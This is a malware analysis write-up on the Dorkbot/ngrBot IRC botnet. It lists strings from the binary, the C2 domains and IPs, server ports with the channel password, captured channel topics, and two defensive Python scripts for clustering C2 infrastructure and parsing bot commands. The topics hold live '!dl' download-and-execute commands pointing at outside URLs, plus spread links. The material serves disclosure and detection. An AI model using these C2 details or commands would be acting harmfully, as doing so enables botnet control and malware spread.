This botnet is a very big one, and the bot used for spreading is also special: it has a lot of features inside, like injection into multiple system processes, Ruskill for killing processes, blocking AV updates and Windows security updates, MSN spreading, FTP infection, etc.
The sample was captured by Xylitol, and then I helped find more IPs and different samples from the same botnet.
The bot is detected as Dorkbot.
Here we go.
Analysis of the sample (strings extracted from the binary):
PASS %s
[.ShellClassInfo]
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
USER %s 0 0 :%s
NICK %s
JOIN %s %s
PART %s
PRIVMSG %s :%s
QUIT :%s
PONG %s
PING
PRIVMSG
[v="%s" c="%s" h="%s" p="%S"]
[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d
[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d
[Slowloris]: Starting flood on "%s" for %d minute(s)
[Slowloris]: Finished flood on "%s"
[UDP]: Starting flood on "%s:%d" for %d second(s)
[UDP]: Finished flood on "%s:%d"
[SYN]: Starting flood on "%s:%d" for %d second(s)
[SYN]: Finished flood on "%s:%d"
[USB]: Infected %s
[MSN]: Updated MSN spread message to "%s"
[MSN]: Updated MSN spread interval to "%s"
[HTTP]: Updated HTTP spread message to "%s"
[HTTP]: Injected value is now %s.
[HTTP]: Updated HTTP spread interval to "%s"
[Visit]: Visited "%s"
[DNS]: Blocked "%s"
[usb="%d" msn="%d" http="%d" total="%d"]
[ftp="%d" pop="%d" http="%d" total="%d"]
[RSOCK4]: Started rsock4 on "%s:%d"
[RSOCK4]: Stopped rsock4
[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)
[d="%s"] Error downloading file [e="%d"]
[d="%s"] Error writing download to "%S" [e="%d"]
[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]
[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]
[d="%s"] Error getting temporary filename. [e="%d"]
[d='%s"] Error getting application data path [e="%d"]
[Visit]: Error visitng "%s"
[FTP Login]: %s
[POP3 Login]: %s
[FTP Infect]: %s was iframed
[HTTP Login]: %s
[HTTP Traffic]: %s
[Ruskill]: Detected File: "%s"
[Ruskill]: Detected DNS: "%s"
[Ruskill]: Detected Reg: "%s"
[PDef+]: %s
[DNS]: Blocked DNS "%s"
[MSN]: %s
[HTTP]: %s
ftplog
poplog
ftpinfect
httplogin
httptraff
ruskill
rdns
rreg
dns
msn
httpspread
blk
http://api.wipmania.com/
.pipe%08x_ipc
heytherebitch.com
ngrBot
keshmoney.biz
ngrBot
smellypussy.info
ngrBot
#boss
ngrBot
bossman
Vmv
30e41aa1
FvLQ49IlzIyLjj6m
die
msn.set
msn.int
http.set
http.int
http.inj
DNS used for the botnet:
Resolved : [keshmoney.biz] To [204.15.252.199]
Resolved : [keshmoney.biz] To [115.146.19.158]
Resolved : [keshmoney.biz] To [61.31.99.67]
Resolved : [keshmoney.biz] To [89.238.176.123]
Resolved : [heytherebitch.com] To [115.146.19.158]
Resolved : [heytherebitch.com] To [204.15.252.199]
Resolved : [heytherebitch.com] To [89.238.176.123]
Resolved : [smellypussy.info] To [204.15.252.199]
Resolved : [smellypussy.info] To [89.238.176.123]
Resolved : [smellypussy.info] To [115.146.19.158]
Resolved : [smellypussy.info] To [61.31.99.67]
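The resolutions above show three domains rotating over the same small pool of addresses, which is the usual sign that they belong to one C2 cluster. The following script is an added example (not from the original post) that parses lines in the same "Resolved : [domain] To [ip]" format, finds the IPs shared by several domains, and groups domains that share infrastructure, directly or through a chain of shared addresses. The sample log embedded in it is constructed with placeholder names and documentation addresses rather than the indicators listed on this page.

```python
import re
from collections import defaultdict

# Matches the "Resolved : [domain] To [ip]" lines as printed in the post.
RESOLVED_RE = re.compile(
    r"Resolved\s*:\s*\[(?P<domain>[^\]]+)\]\s*To\s*\[(?P<ip>[^\]]+)\]"
)

# Constructed sample resolver log in the same format as the post's output.
# Domains and addresses are documentation placeholders, not the post's real indicators.
SAMPLE_LOG = """\
Resolved : [c2-one.invalid] To [198.51.100.10]
Resolved : [c2-one.invalid] To [203.0.113.7]
Resolved : [c2-two.invalid] To [198.51.100.10]
Resolved : [c2-three.invalid] To [203.0.113.7]
Resolved : [c2-three.invalid] To [198.51.100.10]
Resolved : [unrelated.invalid] To [192.0.2.44]
some unrelated line that must be ignored
"""


def parse_resolutions(text):
    """Return (domain, ip) pairs from resolver log lines; non-matching lines are skipped."""
    pairs = []
    for line in text.splitlines():
        m = RESOLVED_RE.search(line)
        if m:
            pairs.append((m.group("domain").strip().lower(), m.group("ip").strip()))
    return pairs


def domains_by_ip(pairs):
    """Map each IP to the set of domains that resolved to it."""
    index = defaultdict(set)
    for domain, ip in pairs:
        index[ip].add(domain)
    return index


def ips_by_domain(pairs):
    """Map each domain to the set of IPs it resolved to."""
    index = defaultdict(set)
    for domain, ip in pairs:
        index[domain].add(ip)
    return index


def shared_infrastructure(pairs, min_domains=2):
    """IPs backing at least `min_domains` distinct domains: the C2 overlap worth blocking."""
    return {
        ip: sorted(domains)
        for ip, domains in domains_by_ip(pairs).items()
        if len(domains) >= min_domains
    }


def cluster_domains(pairs):
    """Group domains that share any IP, directly or transitively (connected components)."""
    by_ip = domains_by_ip(pairs)
    by_domain = ips_by_domain(pairs)
    seen, clusters = set(), []
    for start in sorted(by_domain):
        if start in seen:
            continue
        component, stack = set(), [start]
        while stack:
            domain = stack.pop()
            if domain in seen:
                continue
            seen.add(domain)
            component.add(domain)
            for ip in by_domain[domain]:
                # Every other domain on this IP joins the same cluster.
                stack.extend(by_ip[ip] - seen)
        clusters.append(sorted(component))
    return clusters


def cluster_ips(pairs, domain):
    """All distinct IPs used by the cluster containing `domain` (empty if unknown)."""
    by_domain = ips_by_domain(pairs)
    for cluster in cluster_domains(pairs):
        if domain in cluster:
            return sorted({ip for d in cluster for ip in by_domain[d]})
    return []


if __name__ == "__main__":
    pairs = parse_resolutions(SAMPLE_LOG)
    for ip, domains in sorted(shared_infrastructure(pairs).items()):
        print(f"{ip}: {', '.join(domains)}")
    for cluster in cluster_domains(pairs):
        print("cluster:", cluster)
```

Feeding the page's own resolution lines through `parse_resolutions` and `cluster_ips` gives the full address set to block for any one of the three domains, which is more useful than blocking the domains one at a time, since the bot can be pointed at any of them.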
How to connect to this server:
smellypussy.info:81
heytherebitch.com:81
keshmoney.biz:81
UPDATE:
Remote Host       Port Number
204.15.252.199    49287   (ircd here)
208.75.230.43     80
213.251.170.52    80
61.31.99.67       4042    (ircd here)
Channel:
Now talking in #boss
Topic On: [ #boss ] [ !http.int 6 !http.set wowww!! hahahaha http://smurl.name/3bh6?=facebook_photos_31_05_2011_jpg !msn.int 6 !msn.set wowww!! hahahaha http://x.vu/fbimages1?=facebook_photos_31_05_2011_jpg !mdns http://www.freewebtown.com/usermx/av.txt !dl http://www.freewebtown.com/usermx/nbiz.exe -n !s ]
Topic By: [ b ] b for bullshit lol
NICK new[USA|XP|COMPUTERNAME]zvbnyex
USER hh "" "lol" :hh
JOIN #newbiz#
PONG 422
Channel password: ngrBot
The bin is for sale on underground forums for $400, but you can have it for free now.
UPDATE:
Resolved : [heytherebitch.com] To [216.131.127.13]
Resolved : [heytherebitch.com] To [89.238.176.123]
Resolved : [heytherebitch.com] To [111.90.148.204]
Now talking in #boss
Topic On: [ #boss ] [ !mod pdef off !http.int 5 !http.set wow haha!! http://bit.ly/m9b3kv?=facebook-photo-06-29-2011-jpg !msn.int 5 !msn.set wow haha!! http://goo.gl/KCx6J?=facebook-photo-30-06-2011-jpg !mdns http://rapidshare.com/files/3786834417/avxd.txt !s !s -v !dl http://tinyurl.com/5s3kxcd -n ]
Topic By: [ b ]
(bb) !dl http://tinyurl.com/5s3kxcd -n
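Both captures show the same control pattern: the bot joins with a nick of the form new[COUNTRY|OS|HOSTNAME]random and takes its orders from the channel topic, where each "!" token starts a command (the same names appear in the strings dump above: msn.set, msn.int, http.set, http.int, http.inj). The script below is an added example, not code from the original post, that parses an mIRC-style capture like the ones above into the bot nick fields, the command list and the URLs to block. The command descriptions are taken from the bot's own log strings; the meanings given for !mdns, !mod and !s are inferred and marked as assumptions. The embedded session is constructed with placeholder channel, hostname and URLs, not the page's real indicators.

```python
import re

# Bot nick format seen in the post's capture: new[COUNTRY|OS|HOSTNAME]<random>
NICK_RE = re.compile(
    r"^new\[(?P<country>[A-Z]{2,3})\|(?P<os>[^|\]]+)\|(?P<host>[^\]]+)\](?P<tag>[a-z0-9]+)$"
)
# mIRC-style topic display line: "Topic On: [ #chan ] [ <topic> ]"
TOPIC_RE = re.compile(
    r"^Topic On:\s*\[\s*(?P<chan>\S+)\s*\]\s*\[\s*(?P<topic>.*?)\s*\]\s*$"
)

# Commands seen in the strings dump and channel topics of the post. Descriptions
# follow the bot's own log strings (e.g. "[HTTP]: Updated HTTP spread interval");
# the ones marked "assumed" are inferred from context, not confirmed by the post.
KNOWN_COMMANDS = {
    "msn.set": "set MSN spread message",
    "msn.int": "set MSN spread interval",
    "http.set": "set HTTP spread message",
    "http.int": "set HTTP spread interval",
    "http.inj": "set HTTP injected value",
    "dl": "download and execute a file",
    "mdns": "fetch a DNS block list (assumed, from the [DNS]: Blocked strings)",
    "mod": "toggle a module, e.g. 'pdef off' (assumed)",
    "s": "report status (assumed)",
}

# Constructed sample in the shape of the post's capture; the channel, hostname
# and URLs are placeholders, not the post's real indicators.
SAMPLE_IRC_LOG = """\
Now talking in #chan
Topic On: [ #chan ] [ !http.int 6 !http.set wow!! http://example.invalid/photo.jpg !mdns http://example.invalid/av.txt !dl http://example.invalid/update.exe -n !s ]
Topic By: [ b ]
NICK new[USA|XP|WORKSTATION7]abcdxyz
USER hh "" "lol" :hh
JOIN #chan
PONG 422
"""


def parse_dorkbot_nick(nick):
    """Return the fields of a Dorkbot-style nick, or None for an ordinary nick."""
    m = NICK_RE.match(nick.strip())
    return m.groupdict() if m else None


def parse_topic_commands(topic):
    """Split a topic into (command, args) pairs; each '!' token starts a new command."""
    commands = []
    for token in topic.split():
        if token.startswith("!") and len(token) > 1:
            commands.append((token[1:], []))
        elif commands:
            commands[-1][1].append(token)
    return commands


def extract_urls(commands):
    """Collect every URL argument: the payload and spread links to block or sinkhole."""
    return [arg for _, args in commands for arg in args
            if arg.startswith(("http://", "https://"))]


def analyze_irc_log(text):
    """Summarise a captured IRC session: channel, bot nick fields, commands, URLs, verdict."""
    report = {"channel": None, "bot_nick": None, "commands": [], "urls": []}
    for raw in text.splitlines():
        line = raw.strip()
        topic = TOPIC_RE.match(line)
        if topic:
            report["channel"] = topic.group("chan")
            report["commands"] = parse_topic_commands(topic.group("topic"))
        elif line.startswith("NICK "):
            fields = parse_dorkbot_nick(line[5:])
            if fields:
                report["bot_nick"] = fields
    report["urls"] = extract_urls(report["commands"])
    report["known"] = {c: KNOWN_COMMANDS[c] for c, _ in report["commands"] if c in KNOWN_COMMANDS}
    # Verdict: beacon-style nick plus at least one known topic command.
    report["dorkbot_like"] = report["bot_nick"] is not None and bool(report["known"])
    return report


if __name__ == "__main__":
    result = analyze_irc_log(SAMPLE_IRC_LOG)
    print("channel:", result["channel"], "bot:", result["bot_nick"])
    for name, args in result["commands"]:
        print(f"!{name} {' '.join(args)}  # {KNOWN_COMMANDS.get(name, 'unknown')}")
    print("block:", result["urls"], "verdict:", result["dorkbot_like"])
```

The nick regex and the "!"-prefixed topic grammar are the two stable fingerprints in these captures; the spread messages and URLs change between the two topic snapshots above, so a detection keyed on them alone would have missed the update.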